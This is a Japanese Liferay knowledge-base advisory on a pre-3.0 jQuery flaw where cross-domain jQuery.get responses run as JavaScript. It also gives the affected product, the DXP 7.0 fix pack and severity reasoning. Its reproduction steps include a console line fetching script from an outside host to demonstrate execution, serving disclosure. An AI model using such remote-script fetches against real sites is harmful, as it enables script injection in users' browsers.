legacy-knowledge-base
公開されました Jul. 2, 2025

3.0より前のバージョンのjQueryで、任意のコードが実行される。

投稿者

Laura Li

knowledge-article-header-disclaimer-how-to

knowledge-article-header-disclaimer

legacy-article

learn-legacy-article-disclaimer-text

この記事は、 jQuery バージョン 3.0 より前のセキュリティ問題を文書化したもので、 Githubにも記述されています。

この問題は、以下の手順で再現することができます。

  1. 3.0より前のjQueryを使用したテーマをインストールする。
  2. そのテーマを持つ任意のページに向かいます。
  3. デベロッパーコンソールを開く。
  4. jQuery.get('https://sakurity.com/jqueryxss').then(console.log.bind(console));を入力する。

結果: jQueryでテキストを取得したいだけなのに、ページがJavascriptを実行する。 localhost をコンテンツとするポップアップが表示されます。

対象製品

Liferay DXP 7.0 (DE 7.0)

解像度

DXP 7.0 Fix Pack 28で修正されました。 (lpe-16368)

Liferayのセキュリティ脆弱性情報

この問題は、DXP 7.0のアウトオブボックスコンポーネントが信頼できないサードパーティサイトへのAJAXコールを行わないため、Liferayのセキュリティポリシー の要件を満たさず、Liferay製品の脆弱性とみなされないため、Liferay Security Vulnerability (LSV) の深刻度は付されていません。 したがって、これを利用するには、開発者チームの領域であるカスタムコードを配置する必要があります。

追加情報

Liferayプラットフォームでは、DXP 7.0でjQuery 2.1.4を使用しており、Liferay製品の将来のバージョンでjQueryバージョン3.2.1以上へのアップグレードが予定されています。

did-this-article-resolve-your-issue

legacy-knowledge-base